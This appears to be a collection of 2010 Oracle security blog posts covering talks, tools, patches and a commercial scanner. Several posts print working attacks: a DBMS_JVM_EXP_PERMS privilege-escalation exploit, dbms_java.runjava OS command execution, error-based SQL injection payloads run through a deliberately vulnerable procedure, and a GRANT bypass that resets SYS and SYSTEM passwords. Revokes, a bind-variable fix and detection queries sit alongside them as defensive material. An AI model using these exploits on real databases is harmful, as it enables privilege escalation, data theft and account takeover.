Blackhat 2010 Presentation “Oracle, Interrupted: Stealing Sessions and Credentials” online
The Blackhat Europe 2010 presentation “Oracle, Interrupted: Stealing Sessions and Credentials” (presentation, whitepaper) by Steve Ocepek and Wendel G. Henrique is online. An interview with Steve about the talk can be found here.
As mentioned in a previous blog post, this talk shows how to intercept unencrypted (= default) TNS connections and inject statements into a running session. Steve and Wendel will soon release two tools, Vamp and thicknet.
I will try to present these tools at the DOAG Expertenseminar in Berlin.
A good summary of the talk can be found at Peter Van Eeckhoutten’s blog.
New fast Oracle DES password cracker OPS_SSE2
Dennis Yurichev has released a new brute-force password cracker called ops_sse2 for Oracle DES passwords. It is currently the fastest brute-force cracker for Oracle DES passwords, approx. 3 times faster than woraauthbf from Laszlo Toth.
Here is a quick comparison on my Quad2Core (2.4 GHz):

An 8-character password consisting only of letters can be cracked in approx. 3 hours; with letters and digits it takes approx. 2.5 days for a single password.
Impressive work…
Oracle 11g R2 client trojan warning from Antivir
I just came across a forum entry on OTN, “Possible trojan with 11gR2 Windows 32-bit client on OTN?“. It seems that some virus scanners are reporting a potential trojan in the 32-bit client of Oracle 11gR2.
According to Eric Maurice from the Oracle security team it is a false positive of the Avira Antivir scanner engine.
It is good to know that large software vendors also run into this problem of false positives. This can be really bad for the reputation of a software vendor.
Python Source for PLSQL Unwrapper posted
Niels Teusink has posted a Python script to unwrap PL/SQL code (10g+ only). This python script can unwrap code on the command line.
More details are available in the blog entry of Niels.
This is a better solution than the online unwrapper.
Oracle CPU April 2010 is out
Oracle just released the Oracle CPU (and PSU) for April 2010. As mentioned in a previous blog post, this CPU contains 7 new security vulnerability fixes for the database. None of these vulnerabilities is remotely exploitable without authentication.
The highest CVSS base score in this CPU is 7.5 (Oracle Fusion Middleware). It seems that the Java 0day from David Litchfield is also fixed. But I have to download the Oracle patches to verify that all bugs are fixed.
The following components are affected:
- Change Data Capture
- Core RDBMS
- JavaVM
- Oracle XDB
- RDBMS Security
- XML DB
- Audit
This time all Oracle vulnerabilities are coming from the usual suspects:
Okan Basegmez of DORASEC Consulting; Esteban Martinez Fayo of Application Security, Inc.; Joxean Koret; Alexander Kornbrust of Red Database Security; David Litchfield formerly of NGS Software; Oleg P. of HSC Security Portal; and Alexandr Polyakov of Digital Security.
Oracle has fixed a problem (CVE-2010-0854) I reported in January 2009. It is possible to bypass Oracle Auditing using explain plan. Within the next few days I will release an advisory for this problem.
Joxean Koret released his presentation “Hackproofing Oracle Financials 11i / R12”
Joxean Koret has released his presentation “Hackproofing Oracle Financials 11i / R12” from RootedCON 2010. Joxean shows some nice ways to own old and new Oracle Financials installations.
Thanks to Sid for the link via twitter.
Oracle 11.2.0.1 for Windows - dbms_jvm_exp_perms 0day fixed
This weekend I installed the new version of Oracle 11.2.0.1 (64-bit) for Windows. The 11.2 version for Windows has been available for a few days.
I installed the 64-bit version (default installation: next - next - …) without any problems on a Windows 7 system. After that I ran a default check with our database scanner Repscan 3 (the most advanced database scanner) against this new database version. According to Repscan this new 11.2.0.1 is no longer vulnerable to the DBMS_JVM_EXP_PERMS exploit, and this is correct. Oracle has already fixed the problem. I expect a solution in the upcoming Oracle CPU April 2010.
A quick check in the Repscan database browser shows the difference in the privileges:
11.2.0.1.0 Linux:

11.2.0.1.0 Windows:

Oracle removed the public privilege from DBMS_JVM_EXP_PERMS and granted privileges to the roles “IMP_FULL_DATABASE” and “DATAPUMP_EXP_FULL_DATABASE”.  The privileges of DBMS_JAVA and DBMS_JAVA_TEST are not modified.
The package DBMS_JVM_EXP_PERMS also contains a bug fix. A comparison between the Windows and Linux versions shows the following difference in the package body (the Windows build adds a privilege check before doing its work):
-- DBMS_JVM_EXP_PERMS (only in 11.2.0.1 Windows) ------------------
[…]
-- Check privs
sys.dbms_zhelp_ir.check_sys_priv(DBMS_ZHELP_IR.KZSSTA);
[…]
-- DBMS_JVM_EXP_PERMS ------------------
After that I analyzed the Oracle database with the Repscan database browser (a really useful component, just try the trial version of Repscan) and found a few suspicious audit entries in my audit log (sys.aud$).
A user AIME from the terminal “ST-ADC\DADVFH0169” had a connection to my database? I know that the terminal “ST-ADC\DADVFH0169” is a terminal somewhere at Oracle. A backdoor in 11.2.0.1? Someone from Oracle was accessing my database?
No. After I checked the timestamp I saw that this entry was created 2 days BEFORE I installed my database. Oracle only forgot to cleanup the audit log before delivering it to customers. If you install Oracle 11.2.0.1 you should truncate the SYS.AUD$ table to avoid questions from (internal/external) auditors.
Oracle Java Forensics
Paul released a new article about Oracle Java Forensics. He describes how to find traces of Java attacks (e.g. via dbms_jvm_exp_perms) in the Oracle database.
I’ve got some nice ideas from Paul’s article.
Well done.
Microsoft fixed null pointer IE6/IE7 bug (CVE-2010-0490)
Microsoft released a patch for CVE-2010-0490. More than 1 year ago I reported this issue to Microsoft.
Finally they fixed the problem.
Bug History:
5-February-2009 - Bug reported to Microsoft Security Response Center
30-March-2010 - Patch for CVE-2010-0490 released
László Tóth published his Hacktivity presentation & a tool called pytnsproxy
Today Laszlo sent me an email that he published the English version of his Hacktivity 2009 talk “Oracle authentication” on his webpage. Laszlo was so nice to give me an English private session last year at the Hacktivity in Budapest.
His presentation contains the following topics:
- Introduction
- Oracle native authentication (database)
- Downgrade (Flash Demo)
- Windows authentication
- Module for Squirtle (Flash Demo)
- pytnsproxy (Flash Demo)
I like the part where Laszlo shows how to hijack an Oracle session.
This presentation is a must for everyone interested in the Oracle authentication process.
Well done Laszlo.
2 new ways to create error messages
Today I came across a nice blog article, “Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle” by Dmitry Evteev, about new techniques which can be used in error-based SQL injection. One of the comments contains an additional technique. Even if the title of the blog post is not correct for Oracle (it’s not blind SQL injection, it’s error-based, which is a small but important difference), the idea itself is nice. Sometimes the SQL statements are more complicated than necessary.
Using error messages of XMLType:
The XMLType constructor can be made to raise error messages containing attacker-chosen strings (like database users, passwords, …). The string must start with ‘<:’ so that the parser rejects it as an invalid QName and echoes it back; that’s why ‘<:’ is concatenated in front of the value. Additionally, all spaces and at-signs in the value must be replaced, otherwise the echoed token is cut off before the interesting part.
SQL> select XMLType(('<:'||user||'>')) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName ":SYS" (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1
SQL> select XMLType(('<:'||replace((select banner from v$version where rownum=1),' ','')||'>')) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName
":Oracle9iEnterpriseEditionRelease9.2.0.8.0-Production" (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1
This can be used in an SQL Injection statement:
or 1=length(XMLType(('<:'||replace((select banner from v$version where rownum=1),' ','')||'>')))--
The second technique is mentioned in the comments:
SQL> select extractvalue(xmltype('<x/>'),'/$'||(SELECT banner FROM v$version where rownum=1)) from dual;
*
ERROR at line 1:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00601: Invalid token in: '/$Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
This can be used in an SQL Injection statement:
or 1=length(extractvalue(xmltype('<x/>'),'/$'||(SELECT banner FROM v$version where rownum=1)))--
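To see the error channel end to end, here is an added example that is not part of Dmitry’s article or of this post: a deliberately vulnerable PL/SQL procedure that concatenates its argument into dynamic SQL, the two payloads from above fed through it, and the same procedure rewritten with a bind variable. The table and procedure names (EMP, EMP_LOOKUP_VULN, EMP_LOOKUP_SAFE) are hypothetical, the leaked values are taken from ALL_USERS and SYS_CONTEXT so that the example runs for any database user, and the "and 'a'='a" tail re-balances the quote the procedure appends instead of the trailing -- used above.

```sql
-- Added example, not code from the original post. EMP and the two procedures
-- are hypothetical names; run this in a scratch schema with SQL*Plus.
CREATE TABLE emp (empno NUMBER, ename VARCHAR2(30));
INSERT INTO emp VALUES (7839, 'KING');
COMMIT;

-- Vulnerable: the argument is glued into the statement text, so a quote in
-- p_name ends the literal and the rest of the input is parsed as SQL.
CREATE OR REPLACE PROCEDURE emp_lookup_vuln (p_name IN VARCHAR2)
AS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM emp WHERE ename = ''' || p_name || ''''
    INTO l_cnt;
  DBMS_OUTPUT.PUT_LINE('rows: ' || l_cnt);
END;
/

SET SERVEROUTPUT ON

-- Harmless input behaves as intended (prints "rows: 1").
EXEC emp_lookup_vuln('KING');

-- Payload 1, the XMLType QName trick from above: the closing quote ends the
-- literal, "or 1=length(...)" forces XMLType to parse '<:'||value||'>', and the
-- value comes back inside LPX-00110 ("invalid QName ":<username>" (not a Name)").
-- Spaces are stripped with replace(). Inside the PL/SQL literal every single
-- quote of the payload is doubled.
EXEC emp_lookup_vuln('x'' or 1=length(XMLType((''<:''||replace((select username from all_users where rownum=1),'' '','''')||''>''))) and ''a''=''a');

-- Payload 2, the extractvalue XPath trick from the comments: everything after
-- '/$' is rejected as an invalid token and echoed verbatim in LPX-00601, spaces
-- included, so no replace() is needed (here: "<db_name> <server_host>").
EXEC emp_lookup_vuln('x'' or 1=length(extractvalue(xmltype(''<x/>''),''/$''||(select sys_context(''userenv'',''db_name'')||'' ''||sys_context(''userenv'',''server_host'') from dual))) and ''a''=''a');

-- Hardened: p_name travels as a bind variable. The statement text is fixed,
-- so the payload is just a string that matches no ENAME (prints "rows: 0").
CREATE OR REPLACE PROCEDURE emp_lookup_safe (p_name IN VARCHAR2)
AS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM emp WHERE ename = :name'
    INTO l_cnt USING p_name;
  DBMS_OUTPUT.PUT_LINE('rows: ' || l_cnt);
END;
/

EXEC emp_lookup_safe('x'' or 1=length(XMLType((''<:''||user||''>''))) and ''a''=''a');
```

Note that the error (ORA-31011 / LPX-00110 or LPX-00601) is raised out of the procedure to the client, which is exactly what makes this error-based rather than blind: one request, one value. Any subquery the application user can execute (v$version, sys.user$ if granted, application tables) can be put in place of the ALL_USERS lookup.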
How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password and how to bypass it
I found the following nice article “How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password” [271077.1] on My Oracle Support. As always if I see PL/SQL code I am looking for ways to find security problems or to bypass limitations.
SQL> conn / as sysdba
Connected.
SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent='ALTER' and ora_dict_obj_type = 'USER' and
(ora_dict_obj_name = 'SYSTEM' or ora_dict_obj_name = 'SYS')
THEN
RAISE_APPLICATION_ERROR(-20003,
'You are not allowed to alter SYSTEM/SYS user.');
END IF;
END;
/
Trigger created.
SQL> conn scott/tiger
Connected.
SQL> alter user system identified by alex;
alter user system identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5
SQL> alter user sys identified by alex;
alter user sys identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5
SQL> alter user dbsnmp identified by dbsnmp;
User altered.
Many Oracle users are not aware that the GRANT command can also be used to change passwords or even create users ("grant dba to user1,user2 identified by user1,user2"). In our case we can use this technique to bypass the database trigger, because the trigger only fires on the ALTER event:
SQL> grant connect to sys identified by alex;
Grant succeeded.
SQL> grant connect to system identified by alex;
Grant succeeded.
To fix this problem we have to block grant commands as well….
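An added example of what such a trigger could look like (this is not the code from My Oracle Support note 271077.1, and the trigger and error numbers are my own): it keeps the ALTER check from the note and additionally fires on GRANT, using the ora_grantee event attribute function to reject any grant whose grantee list contains SYS or SYSTEM, which covers the “grant … to sys identified by …” bypass shown above.

```sql
-- Added example, not the trigger from note 271077.1. Create as SYSDBA.
-- Fires for DDL issued by SCOTT (schema-level trigger, as in the note).
CREATE OR REPLACE TRIGGER prohibit_alter_sys_system
  AFTER ALTER OR GRANT ON scott.SCHEMA
DECLARE
  l_grantees ora_name_list_t;   -- filled by ora_grantee()
  l_count    BINARY_INTEGER;
BEGIN
  -- Case 1 (from the note): ALTER USER SYS|SYSTEM ...
  IF ora_sysevent = 'ALTER'
     AND ora_dict_obj_type = 'USER'
     AND ora_dict_obj_name IN ('SYS', 'SYSTEM')
  THEN
    RAISE_APPLICATION_ERROR(-20003,
      'You are not allowed to alter SYSTEM/SYS user.');
  END IF;

  -- Case 2 (the bypass): GRANT <priv|role> TO SYS|SYSTEM [IDENTIFIED BY ...]
  -- ora_grantee() returns the number of grantees and the list itself in the
  -- OUT parameter; any grant that names SYS or SYSTEM is rejected.
  IF ora_sysevent = 'GRANT' THEN
    l_count := ora_grantee(l_grantees);
    FOR i IN 1 .. l_count LOOP
      IF UPPER(l_grantees(i)) IN ('SYS', 'SYSTEM') THEN
        RAISE_APPLICATION_ERROR(-20004,
          'You are not allowed to grant privileges to SYSTEM/SYS.');
      END IF;
    END LOOP;
  END IF;
END;
/

-- Connected as SCOTT (holding ALTER USER and GRANT ANY ROLE), expected results:
--   alter user system identified by alex;         -> ORA-20003
--   grant connect to sys identified by alex;      -> ORA-20004
--   grant connect to dbsnmp identified by dbsnmp; -> Grant succeeded.
```

Two caveats a reviewer would raise: the trigger is bound to SCOTT’s schema, so every other user holding ALTER USER or GRANT ANY ROLE/PRIVILEGE needs its own trigger (or a DATABASE-level one), and a user with ALTER ANY TRIGGER can simply disable it. The trigger is a compensating control; the real fix is not to hand out ALTER USER and GRANT ANY … in the first place.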
New Repscan 3.0 is available
The latest version 3.0 of our database scanner Repscan is now available. This new version supports MS SQL Server and Oracle databases. Repscan comes with a large number of new features and a completely new GUI (the first database scanner with an Office 2007 UI).
Here some of the new features of Repscan 3.0:
- Support for MS SQL Server (2000, 2005, 2008)
- Extremely user-friendly database configuration wizard (screenshot)
- Flexible tree control (re-group databases by status, hierarchy, …) (screenshot)
- Database security browser with drill down functionality (PDF, XLS, … export) (screenshot, screenshot)
- New reports (performance, used_features, …)
- Data Discovery (SSN, PII, Creditcard, Passwords, …)
- Database Enumeration (custom, NMap support) (screenshot)
- Pentest Features (Guess SID, Check default username/password combinations, …)
- Exploit & Code Library (screenshot)
- Version and Patch Information
- Skins
Here some (old) features of Repscan:
- Password plugin architecture
- Password plugins for Oracle DES, SHA1, OID, APEX, OVS
- Commandline features
- PL/SQL Source Code Analysis Report
Here some statements of Repscan 3.0 users:
“Repscan Rocks”, “I must have this tool.”, “Very cool stuff”, “really like the clean interface… checks are great”, “…tend to be more Oracle security information hub than just scanner :-)”
Over the next few weeks I will show here more details of some Repscan 3.0 features.
If you want to test Repscan 3.0 you can download it from our exclusive distributor Sentrigo.
Really good whitepaper about “Hacking Oracle from the Web”
Sumit Siddharth (Sid) has just published a really good whitepaper about “Hacking Oracle from the Web“. This is the most comprehensive published collection of different techniques for attacking Oracle from the web. Sid spent a lot of time composing the different techniques mentioned in various presentations and whitepapers.
Sid describes various techniques like data extraction (in-band techniques like UNION or error messages, out-of-band techniques like heavy queries, blind, …), privilege escalation (sys.kupp$proc, dbms_repcat_rpc and dbms_export_extension) and OS code execution.
Well done Sid.
Interesting Article about SQL Injection in Oracle by Mike Smithers
Mike Smithers, a former colleague, maintains a nice blog called “The Anti-Kyte“. He wrote a really interesting article “Self-Inflicted SQL Injection - don't quote me!” about SQL Injection in Oracle.
Well written Mike.
Oracle Blackhat video removed from Website
Blackhat removed the video from David Litchfield (containing the 0day exploit code for 11g) from their website. But it’s too late because the 0day code for 11g can be found in the meantime in many places.
The video was downloaded several times and it’s just a question of time until it re-appears…
BTW Oracle 10.2.0.4 with all security patches is vulnerable against this issue too. But the exploit must be modified a little bit.
Oracle 11g 0day exploit published
I just read on Sumit Siddharth’s (Sid) blog that the video recording from David Litchfield’s BH presentation was online.
<<UPDATE>> The video was removed from the Blackhat website. <<UPDATE>>
David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:
select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst') from dual;
For security reasons you should:
revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;
I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.
SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3');
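As an added check (not from the original post), two queries a DBA can run after applying the revoke/grant block above, or when comparing installations as in the 11.2.0.1 Windows post further up: the first lists who holds EXECUTE on the Java entry points and the Wrapper class, the second looks in DBA_JAVA_POLICY for the kind of <<ALL FILES>> permission that IMPORT_JVM_PERMS writes for the calling user. The list of grantees excluded in the second query is an assumption about default grants and may need tuning for your release.

```sql
-- Added check, not code from the original post. Run as a DBA.

-- 1) Who can execute the Java entry points? After the hardening above PUBLIC
--    must not appear, and DBMS_JVM_EXP_PERMS should be limited to roles
--    (IMP_FULL_DATABASE/EXP_FULL_DATABASE as in the revoke list, or
--    IMP_FULL_DATABASE/DATAPUMP_EXP_FULL_DATABASE as shipped with 11.2.0.1 Windows).
SELECT grantee, table_name, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA', 'DBMS_JAVA_TEST',
                      'oracle/aurora/util/Wrapper')
 ORDER BY table_name, grantee;

-- 2) Has someone already imported a java.io.FilePermission on <<ALL FILES>>?
--    The exploit above inserts exactly such a GRANT row for USER(). Grantees
--    other than SYS and JAVASYSPRIV (assumed defaults) deserve a closer look;
--    SEQ orders the policy table, so the newest entries come last.
SELECT seq, kind, grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE type_name = 'java.io.FilePermission'
   AND name      = '<<ALL FILES>>'
   AND grantee NOT IN ('SYS', 'JAVASYSPRIV')
 ORDER BY seq;
```

The first query is the same information the Repscan database browser showed in the Linux/Windows comparison; the second is what you want when the question is no longer “could this be exploited” but “has it been”.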
Selling stolen bank data to the government for 2.5 Million EUR?
I came across an interesting article in the German newspaper FAZ. Someone is offering data of 1500 Swiss bank customers (with black money) to the German government for 2.5 Million EURO. A quick check of the tax fraud investigators showed that the data is reliable.
The return on investment (ROI) is approx. 100 million EUR for the German government (4% for the data thief). Our minister of finance is still considering whether he should make this deal. This would be good for the German government (more money, lower taxes for Germans) but bad for the Swiss banking industry.